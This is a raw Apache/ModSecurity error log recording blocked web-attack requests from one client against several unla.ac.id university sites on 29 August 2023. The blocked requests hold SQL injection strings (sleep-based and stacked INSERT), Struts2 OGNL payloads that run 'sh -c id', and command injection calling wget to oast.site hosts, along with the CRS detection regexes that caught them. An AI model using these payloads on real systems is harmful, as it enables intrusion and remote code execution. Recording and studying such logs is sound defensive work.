[Tue Aug 29 11:33:55.541602 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAAPDoLcAAAAP"]
[Tue Aug 29 11:33:57.130276 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASHh3YAAAAD"]
[Tue Aug 29 11:33:57.191600 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASHh3kAAAAD"]
[Tue Aug 29 11:33:57.372872 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlg6mqjsmxqqsmqd.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAASHh4AAAAAD"]
[Tue Aug 29 11:33:57.387322 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgywyfxht3zyd5z.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-24AAAAb"]
[Tue Aug 29 11:33:57.429139 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgkm1jseadh7xwa.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-3AAAAAb"]
[Tue Aug 29 11:33:57.505392 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgrj8r6xnrsye1h.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAASHh4YAAAAD"]
[Tue Aug 29 11:33:57.512454 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAARy-3QAAAAb"]
[Tue Aug 29 11:33:57.591978 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11NcCo-f0AAASHh4kAAAAD"]
[Tue Aug 29 11:33:57.615012 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAARy-3kAAAAb"]
[Tue Aug 29 11:33:57.655197 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgr3fy3wgnxi5aw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-3sAAAAb"]
[Tue Aug 29 11:33:57.724593 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASGMrsAAAAA"]
[Tue Aug 29 11:33:58.089234 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAARxOtUAAAAa"]
[Tue Aug 29 11:33:58.097838 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASMgdQAAAAO"]
[Tue Aug 29 11:33:58.112279 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASK4b8AAAAI"]
[Tue Aug 29 11:33:58.117548 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASNznQAAAAQ"]
[Tue Aug 29 11:33:58.179326 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASMgdgAAAAO"]
[Tue Aug 29 11:33:58.280934 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NsCo-f0AAASK4cMAAAAI"]
[Tue Aug 29 11:33:58.456295 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgwykxs598ct6fq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAARy-4gAAAAb"]
[Tue Aug 29 11:33:58.942553 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASK4coAAAAI"]
[Tue Aug 29 11:33:59.100109 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAARy-48AAAAb"]
[Tue Aug 29 11:33:59.119964 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAARy-5AAAAAb"]
[Tue Aug 29 11:33:59.121221 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASPDJQAAAAS"]
[Tue Aug 29 11:33:59.124923 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASQp-AAAAAT"]
[Tue Aug 29 11:33:59.134420 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id 